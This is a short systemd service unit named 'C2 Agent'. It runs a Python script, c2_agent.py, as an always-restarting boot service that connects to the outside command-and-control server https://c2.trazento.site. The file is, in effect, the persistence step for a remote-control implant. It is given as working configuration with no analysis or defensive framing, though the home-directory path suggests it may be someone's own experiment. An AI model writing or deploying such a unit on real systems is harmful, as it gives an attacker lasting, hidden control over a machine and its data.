[Unit]
Description=C2 Agent
After=network.target

[Service]
Type=simple
ExecStart=/usr/bin/python3 /home/noob-debian/Documents/Vscode/C2/c2_agent.py --server https://c2.trazento.site
Restart=always
RestartSec=10

[Install]
WantedBy=multi-user.target
